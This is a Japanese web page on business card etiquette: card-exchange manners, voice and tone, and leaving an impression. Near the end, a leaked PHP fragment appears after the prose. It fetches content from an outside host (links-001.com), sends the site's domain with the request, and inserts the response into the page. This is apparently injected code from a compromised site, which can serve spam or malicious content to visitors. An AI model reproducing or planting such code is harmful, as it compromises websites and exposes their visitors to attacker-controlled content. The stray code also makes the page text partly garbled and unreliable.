前へ
次へ

名刺はあなたを表す顔であり、声です

社会人なら誰しも一度は所持し、取引先やグループ会社の同僚、久々に会った友人等、多くの人に配った事があるはずです。
また、渡したからには必ず相手のそれも受け取ることになり、もらったものは分厚いカードケースへと保存されることになります。
あなたがそのカードケースを見返したとき、もらった相手との会話、雰囲気、言葉遣いを思い出します。
つまりは、名刺こそ、渡した相手にあなた自身を思い出させる一つのきっかけなのです。
だからこそ、名刺を渡す際には自身の上司と相手の上司が最初に交換する事や、胸の高さで受け取る事、角で遊ばない事等、数多くのマナーが存在しているのです。
基本的なマナーは勿論ですが、人間の記憶に一番印象強く残る物が音である事を考えると、言葉遣いや声のトーンも重要となってきます。
しかし、マナーのみを守った名刺交換では、相手の印象に残る事はあり得ません、なぜなら、それが普通だからです。
今一度、名刺を渡すその一瞬の会話や諸仕草を見直してみてはいかがでしょうか。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top